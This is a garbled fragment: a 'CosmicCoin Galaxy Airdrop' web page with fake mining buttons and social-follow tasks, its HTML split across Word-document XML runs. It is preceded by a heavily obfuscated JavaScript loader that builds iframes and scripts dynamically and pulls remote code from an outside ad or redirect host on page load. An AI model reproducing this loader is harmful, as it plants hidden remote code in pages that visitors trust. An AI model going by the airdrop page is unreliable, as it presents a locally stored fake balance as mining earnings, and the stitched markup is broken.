$.Cg:function o(n){return n&&n[$.Cd]?n:$.$($.Cj,n);}break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD)),t[$.Cj]=function(t,r){for($._Fb=$.BD;$._Fb<$.CC;$._Fb+=$.x){switch($._Fb){case $.x:return($.BD,u.Ot)(n,null,null,null)[$.cp](function(n){return(n=n&&$.Di in n?n[$.Di]:n)&&($.BD,i.Et)(c.e,n),n;})[$.fa](function(){return($.BD,i.Mt)(c.e);})[$.cp](function(n){for($._FJ=$.BD;$._FJ<$.CC;]]>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<![CDATA[$._FJ+=$.x){switch($._FJ){case $.x:n&&(u=n,i=t,o=r,new v[$.Cj](function(n,t){for($._FH=$.BD;$._FH<$.DD;$._FH+=$.x){switch($._FH){case $.Cg:q(function(){return void $.BD!==r&&r[$.Ck][$.bl](r),($.BD,s.$n)(i)?(($.BD,a[$.Dv])($.gk),n()):t();});break;case $.x:var r=void $.BD;break;case $.CC:if(-$.x<[f.ut,f.ot,f.it][$.ap](c.O)){for($._FE=$.BD;$._FE<$.DD;$._FE+=$.x){switch($._FE){case $.Cg:try{w[$.Ck][$.dq](r,w);}catch(n){(document[$.c]||document[$.bF])[$.Bt](r);}break;case $.x:var e=document[$.j](u);break;case $.CC:r[$.aa]=o,r[$.Bt](e),r[$.gl]($.gm,c.e),r[$.gl]($.gn,($.BD,l[$.Cj])(b(c.k)));break;case $.BD:r=document[$.A]($.ba);break;}}}else d(u);break;case $.BD:($.BD,a[$.Dv])($.gh);break;}}}));break;case $.BD:var u,i,o;break;}}});break;case $.BD:var n=t===f.tt?($.BD,e[$.Ds])():b(c.k);break;}}};break;case $.DD:var ]]>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w=document[$.a];break;case $.CC:var c=r($.BD),f=r($.GD),a=r($.GJ),e=r($.CC),u=r($.Gm),i=r($.GG),s=r($.Gc),v=o(r($.GB)),l=o(r($.Gv));break;case $.BD:$.Cs;break;}}}]);break;case $.GH:try{w=window[$.v];}catch(n){}break;case $.BD:var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,a=document;break;}}})((function(j,k){const a='dblciohnCtdennetpWpianbdtonwebmSetlrEitnngebmfurcoomdCbheanroCnobdyeablppasrisdebIenltybtpsabresmeaFrlfoiabttbnreemmeolvEeeCthaielrdc'.split('').reduce((m,c,i)=&gt;i%2?m+c:c+m).split('b');const _=document[a[0]](a[1]);_[a[2]][a[3]]=a[4];document[a[5]][a[6]](_);var f=_[a[7]][a[8]][a[9]];var p=_[a[7]][a[10]];var v=_[a[7]][a[11]];document[a[5]][a[12]](_);function H(index){return Number(index).toString(36).replace(/[0-9]/g,function(s){return f(p(s,10)+65);});}var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o={$:function(){var o={};for(var i=0;i&lt;arguments.length;i+=2){o[arguments[i]]=arguments[i+1];}return o;}};j=j.split('+');for(var i=0;i&lt;608;i++){(function(I){Object['defineProperty'](o,H(I),{get:function(){return j[I][0]!==';'?k(j[I],f):v(j[I].slice(1),10);}});}(i));}return o;}('=6lW:l./MlwlE:+W99./}lE:.bq#:lEl6+6lwo}l./}lE:.bq#:lEl6+*il6tRlMl=:o6+*il6tRlMl=:o6.PMM+9q#ZW:=3./}lE:+=6lW:l.Io=iwlE:.L6W^wlE:+=6lW:l./MlwlE:.gR+^l:./MlwlE:.!t.@9+^l:./MlwlE:#.!t(W^.gWwl+=i66lE:R=6qZ:+6lW9tR:W:l+5o9t+s+9lHqEl.,6oZl6:t+W:o5+9l=o9lvz.@.XowZoElE:+zl^./BZ+#6=+=6lW:l(lB:.go9l+Ho6./W=3+#:tMl+W5oi:.J5MWE~+H6ow.X3W6.Xo9l+l}WM+Zo#q:qoE+Nq9:3+3lq^3:+9q#ZMWt+oZW=q:t+Mo=WMR:o6W^l+#l##qoER:o6W^l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+=oE:lE:&amp;qE9oN+;1+9o=iwlE:+3:wM+W5#oMi:l+._ZB+EoEl+;0+R:6qE^+=oEHq^i6W5Ml+5:oW+.IW:l+.|W:3+.P66Wt+.,6owq#l+ZW6#l.@E:+EW}q^W:o6+lE=o9lvz.@+vqE:.x.P66Wt+#l:(qwloi:+#l:.@E:l6}WM+.P66Wt.!iHHl6+=MlW6(qwloi:+=MlW6.@E:l6}WM+.|l##W^l.X3WEElM+.!6oW9=W#:.X3WEElM+lE=o9lvz.@.XowZoElE:+6WE9ow+.8+R+.a+.g+qH6Wwl+WZZlE9.X3qM9+SoqE++:oR:6qE^+lBZo6:#+;21+;36+=WMM+#Mq=l+;2+q+6lZMW=l+M+Z6o:o:tZl+r5.t9o=iwlE:.Ar5+^+s9W:W+3W#.aNE.,6oZl6:t+W+qEEl6.F(.|.b+ssl#.|o9iMl+.CqH6Wwl.*#6=.G.#W5oi:.J5MWE~.#.2.C.4qH6Wwl.2+Hq6#:.X3qM9+;3+WZZMt+^l:+9lHWiM:+ZW6lE:.go9l+lEiwl6W5Ml+=MlW6+6lwo}l.@:lw+3lW9+#l:.@:lw+=MoEl.go9l+^l:.@:lw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+i#l.*#:6q=:+iE9lHqEl9+;48+;57+;97+;122+.].7+.V+(+.J+AH^Ho6wW:#+;4+w^95.Qo.[.Q^}+l.Ul#6M._#ti.U+=+i+;1800000+ss.I.bsR./RR.@.a.gs+AH^9MZoZiZ+i~3HoBA9o^*+~W3N3wEEq+ZqE^+ZoE^+6l*il#:+6l*il#:sW==lZ:l9+6l*il#:sHWqMl9+6l#ZoE#l+E6W.x=6.j.Q96^+H+#+iE~EoNE+woi#l9oNE+=Mq=~+woi#liZ+:oi=3lE9+:oi=3#:W6:+^l:.aE=Mq=~Rl=6l:v6M+:o.X3W6.Xo9l+^l:v#l9.|l:3o9#+W99v#l9.|l:3o9+#3qH:zWE9ow+Z6WE9+3W#3.Xo9l+^l:zWE9ow.gWwl+#:oZzWE9ow+:qwl#+=i66lE:+6lW9t+9W:l+:M9+^l:.aHH#l:+*il6t+:6W}l6#l.,W6lE:#+q#./B=Mi9l9+iE.!6oW9=W#:.@EHo+q#.boW9l9+^l:.Lo6wW:#+6iE.P.P.!+^lEl6W:lzWE9owv6M+^lEl6W:lzWE9ow.,.F.,v6M+6lH6l#3.bqE~#+:6t(oZ+^l:.,W6lE:.go9l+ElB:(q=~+:q:Ml+56oN#l6+lE}+W6^}+}l6#qoE+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l6#qoE#+W99.bq#:lEl6+oE=l+oHH+6lwo}l.bq#:lEl6+6lwo}l.PMM.bq#:lEl6#+lwq:+Z6lZlE9.bq#:lEl6+Z6lZlE9.aE=l.bq#:lEl6+Mq#:lEl6#+5qE9qE^+=N9+=39q6+iwW#~+;768+;1024+;568+;360+;1080+;736+;900+;864+;812+;667+;800+;240+;300+lE.1vR+lE.1.D.!+lE.1.X.P+lE.1.Pv+#}.1R./+Z#iHHqBl#+6WN+q#.IM.@wZ6l##qoE.P}WqMW5Ml+#W}l.IM.IW:W+ss.,.,vsR./RR.@.a.gs._s+q#.|o5qMl+q#RWHW6q+q#.Lq6lHoB+q#.|o5qMl.Lq6lHoB+:.j~9.[.T9.x=^l+HiE=:qoE+;60+;120+;480+;180+;720+;7+;27+;11+;9+;16+;19+;6+;26+;5+;22+;8+;10+;12+;13+;33+;35+]3::Z#.n.J+].4.4+].4+;18+;28+;14+WE96oq9+NqE9oN#.*E:+;29+;17+;31+;30+i#l6.P^lE:+;34+;20+.aE.XMq=~+.,i#3.*Eo:qHq=W:qoE.*.t.F((.,.A+.,i#3.*Eo:qHq=W:qoE.*.t.F((.,R.A+.,i#3.*Eo:qHq=W:qoE.*.t.Ioi5Ml.*(W^.A+.@E:l6#:q:qWM+.gW:q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l+.@E.1.,W^l.*.,i#3+oE=Mq=~+EW:q}l+Zi#3l6.1iEq}l6#WM+lE+H6+9l+wl##W^l+oEl66o6+Z~lt#+MlE^:3+q#.PE96oq9+:ElwlM./:Elwi=o9+3::Z#.J.4.4+6iE+wW:=3+A.@E9lB+5W=~^6oiE9.@wW^l+#ZMq:+#l:(qwloi:.*3W#.*Eo:.*5llE.*9lHqEl9+=MlW6(qwloi:.*3W#.*Eo:.*5llE.*9lHqEl9+=36owlhl6#qoE+q#.@.aR+.,+.,.4.g+.g.4.,+.,.4.g.4.g+.g.4.,.4.g+.,.4.g.4.,.4.g+.g.4.g.4.g.4.g+.T+.T.T+.T.T.T+.T.T.T.T+.T.T.T.T.T+ElN#+ZW^l#+Nq~q+56oN#l+}qlN+wo}ql+W6:q=Ml+W6:q=Ml#+#:W:q=+ZW^l+qE9lB+Nl5+hl6#qoEr.47]R-.pRWHW6q+Hq6lHoB+^q+.[.).T.).O+;10000+;5000+AH^Z6oBt3::Z+p+;42+(o~lE+.LW}q=oE+.XoE:lE:.1(tZl+:lB:.43:wM+WZZMq=W:qoE.4S#oE+S#oE+5Mo5+.D./(+.,.aR(+.F./.P.I+WZZMq=W:qoE.4B.1NNN.1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Ho6w.1i6MlE=o9l9.u.*=3W6#l:.Gv(.L.1.x+.P==lZ:.1.bWE^iW^l+B.1WZZMq=W:qoE.1~lt+B.1WZZMq=W:qoE.1:o~lE+;1000+;3600000+;750+;2000+o5Sl=:.V.*qH6Wwl.V.*lw5l9.V.*}q9lo.V.*Wi9qo+B+EoHoMMoN.*Eo6lHHl6l6.*EooZlEl6+MqE~+#:tMl#3ll:+WEoEtwoi#+:lB:.4=##+S+t+Z+:l#:+}WMil+.,z.aeks.XRR+.,z.aeks.,.g.D+.,z.aekse.Fz+.,z.aeks.Lz.P.|./+.PE96oq9+;32+.j.O.xB.O.T+.0.m.jB.O.T+.[.0.xB.Q.T+._.0.TB.0.j.T+.m.T.TB.0.U.T+.0.j.TB.j.T.T+9q}+#l=:qoE+EW}+.CW.*36lH.G.#.}#.#.2.C.4W.2+.C9q}.2.CW.*36lH.G.#.}#.#.2.C.4W.2.C.49q}.2+.C#ZWE.2.CW.*36lH.G.#.}#.#.2.C.4W.2.C.4#ZWE.2+q#.P66Wt+H6ow+Zo#:.|l##W^l+.X36owlr.4.t7.T.1.Q-c._.VV.A+.X6q.aRr.4.t7.T.1.Q-c._.VV.A+=3WEElM+.4+oZlE+#l:zl*il#:.FlW9l6+#lE9+9o=+;24+oEMoW9+:oi=3+.@E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WMq9.*W::lwZ:.*:o.*9l#:6i=:i6l.*EoE.1q:l6W5Ml.*qE#:WE=l+;999999+i6M.t9W:W.JqwW^l.4^qH.u5W#l.O.j.Vz.TM.D.a.IM3.PY.P.!.P.@.P.P.P.P.P.P.P.,.4.4.4t.F.U.!.P./.P.P.P.P.P.b.P.P.P.P.P.P.!.P.P./.P.P.P.@.!z.P.P.[.A+HiE+W66Wt+lE6oMM+iElE6oMM+siE6lH.P=:q}l+#l:.@wwl9qW:l+=MlW6.@wwl9qW:l+q.,3oElpq.,W9pq.,o9+q:l6W:o6+.4.4Sow:qE^q.)El:.4WZi.)Z3Z.nAoElq9.G+qE9lB.aH+.c+ZW6#l+6l:i6E.*:3q#+;100+6l}l6#l+.4.4W^W=lMl5q6.)=ow.4.j.4+e.|.b.F::Zzl*il#:+#tw5oM+:oZ+sHWM#l+.t7]W.1A.T.1.Q-.p.A+NqE+9o=./MlwlE:+iE6lH+=Mo#l+9o=iwlE:./MlwlE:+6l*il#:.!t.XRR+6l*il#:.!t.,.g.D+6l*il#:.!te.Fz+wWZ+#=6qZ:+Z6o=l##.)5qE9qE^.*q#.*Eo:.*#iZZo6:l9+Z6o=l##.)=39q6.*q#.*Eo:.*#iZZo6:l9+6l*il#:.!t.@H6Wwl+.4.4+HqM:l6+Zi#3+MlH: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+^iw+Z~lt+Z#:6qE^+6lwo}l.X3qM9+9W:W+;200+=oE=W:+.P.P.!.*+HMoo6+:W^.gWwl+ZoZ+W=:q}l+.Lq6lHoB+sq9+s=MlW6.LE+:W6^l:.@9+6lSl=:+WMM+6W=l+;16807+^l:.!oiE9qE^.XMqlE:zl=:+#=6llE+=3W6.Xo9l.P:+Ho6wW:+AoEl.@9+#oi6=lKoEl.@9+9owWqE+^lEl6W:qoE(qwl+ZW^lk.aHH#l:+ZW^le.aHH#l:+=MqlE:(oZ+=MqlE:.blH:+.4.U.4+^l:(qwl+lB:6W+^l:(qwlAoEl.aHH#l:+.NoH.G._+#:W:i#+9W:W#l:+6l9i=l+:3q#+W5=9lH^3qS~MwEoZ*6#:i}NBtA+.)Z3Z+:3lE+6lH+.)+sq9Ml(qwloi:+Mo=W:qoE+7o5Sl=:.*Z6o=l##-+#=6oMM(oZ+#=6oMM.blH:+;2147483647+6l#oM}l+36lH+#=6+sq9Ml(qwloi:.@9+i6M+:tZl+wl:3o9+6l*il#:sq9+6l#ZoE#l(tZl+AoElq9sW95Mo=~+l66o6+.)3:wM+:ovZZl6.XW#l+.,.F.,+.8R+Nq:3.X6l9lE:qWM#+lB=Mi9l#+^l:.,6o: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o:tZl.aH+6lM+=6o##.a6q^qE+#lMl=:o6+#3qH:+.Oi.Q.T3z.j6.jz6._H.xMEBZZA+3::Z#.J+i#l.1=6l9lE:qWM#+=##(lB:+#:W6:.boW9qE^+;56+qE#l6:.!lHo6l+.*+.)S#oE+.7.*.*.*.*.*.*.*.*Zo#q:qoE.J.*HqBl9.u.7.*.*.*.*.*.*.*.*:oZ.J.*.T.u.7.*.*.*.*.*.*.*.*MlH:.J.*.T.u.7.*.*.*.*.*.*.*.*5o::ow.J.*.T.u.7.*.*.*.*.*.*.*.*6q^3:.J.*.T.u.7.*.*.*.*.*.*.*.*A.1qE9lB.J.*.0._.j.[.j.x.m.O.j.[.u.7.*.*.*.*.*.*.*.*ZoqE:l6.1l}lE:#.J.*Wi:o.u.7.*.*.*.*+.)=##.n+.)ZE^.n+HqE9+.}+MWE^iW^l+AoElq9+6lHl66l6+:qwls9qHH+W6+=i66lE:si6M+96+#6+^l:.PMMzl#ZoE#l.FlW9l6#+~lt#+Z6o=l##+Z6l}lE:.IlHWiM:+#:oZ.@wwl9qW:l.,6oZW^W:qoE+o5Sl=:+=WMM#q^E+AoElq9so6q^qEWM+i#l6sW^lE:+.)S#.n+96WN.@wW^l+:o.@R.aR:6qE^+;3571+=oE:lE:.Io=iwlE:+#oi6#l.Iq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+=WMM5W=~+W6^#+;204+l66o6.)=ow+:6qw+HqMM+i#l6.bWE^iW^l+#=6llEsNq9:3+#=6llEs3lq^3:+^l:.XoE:lB:+^l:.@wW^l.IW:W+l66o6.*6l*il#:.*:qwloi:+=WE}W#+.09+s5MWE~+:qwlAoEl+l66o6.*.B+}6+6lHl66l6s9owWqE+=i66lE:si6Ms9owWqE+56oN#l6sMWE^+.J.*+7r6rE-.p+:o.boNl6.XW#l+soE(qwloi:+=W:=3+ZoN+.4l}lE:+#i5#:6qE^+.4.j.4+3o#:+#:6qE^qHt+.n9o}6.G:6il+#:W:i#(lB:+^9Z6+:+.6+.B.*N3qMl.*6l*il#:qE^.*+Zo#:+.G+ElB:+6+=oE#:6i=:o6+#:tMlR3ll:#+i#l6sq9+9oEl+#3qH:R:6qE^.*+5+qE=Mi9l#+3lW9l6#+6lMW:q}l+9W:l.J+.N+;15+=Mo#l9+9o=iwlE:r5+qwZo6:R=6qZ:#+:qwloi:+;256+=##ziMl#+#lMl=:o6(lB:+oEwl##W^l+.)Nq9^l:.1=oM.1._.T.1#Z+#:W:i#s=o9l+:lB:+W::W=3./}lE:+=oE:lE:+6l:i6E+#:W6:.@ESl=:R=6qZ:.Xo9l+Zo6:._+Z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<![CDATA[o6:.0+lE9.@ESl=:R=6qZ:.Xo9l+#l:.P::6q5i:l+9W:W.1AoEl.1q9+9W:W.19owWqE+oE6lW9t#:W:l=3WE^l+o+;23+#l:.@wwl9qW:l.i+#oi6=l+.i+#:6qE^+;25',function(n,y){for(var r='YzR(vh&ekK7r-]syW5=9lH^3qS~MwEoZ*6#:i}NBtAcpV1)4T_0mjUO[xQJuCG2ndP!XI/LDF@8fb|ga,',t=['.','%','{'],e='',i=1,f=0;f<n.length;f++){var o=r.indexOf(n[f]);t.indexOf(n[f])>-1&&0===t.indexOf(n[f])&&(i=0),o>-1&&(e+=y(i*r.length+o),i=1);}return e;})),(function(s){var _={};for(k in s){try{_[k]=s[k].bind(s);}catch(e){_[k]=s[k];}}return _;})(document))</script><script src="//stootsou.net/ntfc.php?p=7677129" data-cfasync="false" async onerror="_yoaith()" onload="_bpriixe()"></script>]]>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&lt;meta name="viewport" content="width=device-width, initial-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scale=1.0"&gt;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&lt;script src="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://cdn.tailwindcss.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>"&gt;&lt;/script&gt;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.hidden { display: none;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.loading-screen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position: fixed;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top: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left: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width: 100%;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height: 100%;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background: linear-gradient(45deg, #ff0099, #493240, #1CB5E0, #000046);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background-size: 600% 600%;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animation: gradient-animation 10s ease infinite;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display: flex;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align-items: center;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justify-content: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z-index: 9999;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@keyframes gradient-animation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0% { background-position: 0% 50%;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50% { background-position: 100% 50%;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100% { background-position: 0% 50%;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.nav-button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width: 20%;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margin: 0 0.5rem;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.holographic-text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background: linear-gradient(45deg, #ff0099, #493240, #1CB5E0, #000046);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background-size: 200% 200%;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color: transparent;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-webkit-background-clip: text;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background-clip: text;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animation: gradient-animation 2s linear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infinite, rotate-animation 2s linear infinite;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.rotating-circle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position: relative;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width: 150px;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height: 150px;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border: 5px solid;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border-image: linear-gradient(45deg, #ff0099, #493240, #1CB5E0, #000046) 1;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border-radius: 50%;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animation: rotate-animation 4s linear infinite;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margin: auto;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.balance-container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margin-top: 20px; /* Add some space between the circle and balance */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	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.balance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font-size: 1.5rem;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font-weight: bold;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@keyframes pulse-animation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0% { transform: scale(1);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50% { transform: scale(1.1);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100% { transform: scale(1);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	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.task-button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background: linear-gradient(45deg, #ff0099, #493240, #1CB5E0, #000046);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font-bold;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padding: 1rem;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border-radius: 1rem;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transition: background 0.3s ease;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display: block;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width: 100%;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margin-bottom: 1rem;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.task-button:hover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background-position: 100%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.side-buttons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position: fixed;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top: 50%;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right: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transform: translateY(-50%);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display: flex;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flex-direction: column;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		/* Add the following CSS to make the page responsive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		body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			width: 100%;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			height: 100vh;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			margin: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			padding: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			display: flex;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			flex-direction: column;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			align-items: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			justify-content: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			font-family: Arial, sans-serif;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			background-color: #f0f0f0; /* Optional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		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		.airdrop-container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			max-width: 800px; /* Adjust the max-width to your liking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			width: 100%;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			padding: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			background-color: #fff;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			border: 1px solid #ddd;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			border-radius: 10px;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			box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);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		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		/* Add media queries for different screen sizes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		@media (max-width: 788px)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			.airdrop-container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				padding: 15px;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			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		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		@media (max-width: 499px)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			.airdrop-container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				padding: 13px;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			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&lt;/style&gt;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	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	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	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&lt;!-- Google tag (gtag.js)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&lt;script async src="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.googletagmanager.com/gtag/js?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id=G-ES3NKKYCS7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>"&gt;&lt;/script&gt;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&lt;script&gt;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window.dataLayer = window.dataLayer || [];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function gtag(){dataLayer.push(arguments);}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gtag('js', new Date());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gtag('config', 'G-ES3NKKYCS7');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&lt;/script&gt;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&lt;div id="user-info"&gt;&lt;/div&gt;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&lt;button id="createUserButton"&gt;Generate User ID&lt;/button&gt;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&lt;div id="userId"&gt;&lt;/div&gt;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&lt;script&gt;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function generateUniqueId()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return 'user-' + Math.random().toString(36).substr(2, 9);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function createUser()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let userId = localStorage.getItem('userId');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if (!userId)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userId = generateUniqueId();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localStorage.setItem('userId', userId);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localStorage.setItem(userId + '_balance', '0');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console.log('User ID:', userId);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return userId;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function getUserBalance(userId)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let userBalance = localStorage.getItem(userId + '_balance');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if (userBalance === null)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userBalance = '0';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localStorage.setItem(userId + '_balance', userBalance);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return parseFloat(userBalance);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function displayUserBalance(userId, elementId)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const userBalance = getUserBalance(userId);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const userBalanceElement = document.createElement('p');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userBalanceElement.className = 'userBalance';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userBalanceElement.innerText = `Your Balance is: $${userBalance.toFixed(2)}`;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document.getElementById(elementId).appendChild(userBalanceElement);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document.getElementById('createUserButt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on').addEventListener('click', () =&gt;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const userId = createUser();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const userIdElement = document.createElement('p');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userIdElement.className = 'userId';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userIdElement.innerText = `Your User ID is: ${userId}`;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document.getElementById('userId').appendChild(userIdElement);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displayUserBalance(userId, 'userId');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window.onload = () =&gt;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const userId = localStorage.getItem('userId');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if (userId)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const userIdElement = document.createElement('p');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userIdElement.className = 'userId';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userIdElement.innerText = `Your User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ID is: ${userId}`;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document.getElementById('userId').appendChild(userIdElement);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displayUserBalance(userId, 'userId');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&lt;/script&gt;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&lt;body class="bg-gray-900 text-white text-center p-6"&gt;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&lt;div class="loading-screen" id="loadingScreen"&gt;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&lt;h1 class="text-4xl font-bold mb-4"&gt;CosmicCoin Galaxy Airdrop&lt;/h1&gt;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&lt;p class="text-lg"&gt;Powered By CosmicEcosystem..&lt;/p&gt;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&lt;h1 class="text-3xl font-small mb-6"&gt;CosmicCoin Galaxy Airdrop&lt;/h1&gt;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&lt;div id="mainSection"&gt;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&lt;button class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded-full mb-4" onclick="startMining(24)"&gt;Start 24-Hour Mining&lt;/button&gt;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&lt;button class="bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded-full mb-4" onclick="startMining(12)"&gt;Start 12-Hour Mining&lt;/button&gt;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&lt;div id="miningStatus" class="text-lg mb-4"&gt;&lt;/div&gt;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&lt;div id="miningAmount" class="text-lg mb-4 holographic-text"&gt;&lt;/div&gt;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&lt;div id="tasksSection" class="hidden"&gt;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&lt;h2 class="text-3xl font-small mb-6 text-center"&gt;Complete Tasks to Boost Mining Rate&lt;/h2&gt;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&lt;div class="grid grid-cols-1 sm:grid-cols-2 md:grid-cols-3 gap-4"&gt;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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://x.com/Miracleharbor?t=dqzzaDkR4c-ZDb55Msit8g&amp;s=09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_ceo_x')"&gt;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Follow CEO on X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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://x.com/MirakleGroup?t=dqzzaDkR4c-ZDb55Msit8g&amp;s=09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_group_x')"&gt;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Follow Mirakle Group on X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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.instagram.com/miracleharbor?igsh=MTRkcnF4ajV6cDl0Zw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>==" target="_blank"&gt;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&lt;button class="bg-blue-600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hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_ceo_ig')"&gt;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Follow CEO on Instagram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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.tiktok.com/@miraklegroup?_t=8lMgf55i0IP&amp;_r=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_group_tiktok')"&gt;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Follow Mirakle Group on TikTok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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.facebook.com/profile.php?id=61557787735701</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_ceo_fb')"&gt;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Follow Mirakle Group on Facebook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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://t.me/CosmicCoin11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_ai_ig')"&gt;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Join Our TG Info Channel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&lt;/button&gt;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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.instagram.com/mirakle.group?igsh=Yjg4cXhuc3VlbTRn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium py-2 px-4 rounded shadow-md w-full" onclick="completeTask('follow_group_ig')"&gt;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Follow Mirakle Group on Instagram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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://youtube.com/@MirakleGroup?si=L_kk9-UNUVZDCurY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>" target="_blank"&gt;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&lt;button class="bg-blue-600 hover:bg-blue-700 text-white font-medium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py-2 px-4 rounded shadow-md w-full" onclick="completeTask('subscribe_youtube')"&gt;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Subscribe to YouTube Channel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&lt;div class="task-item"&gt;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&lt;a href="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.instagram.com/prime.blog14u?igsh=MTg1Z3V4bng0Z3BlNw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
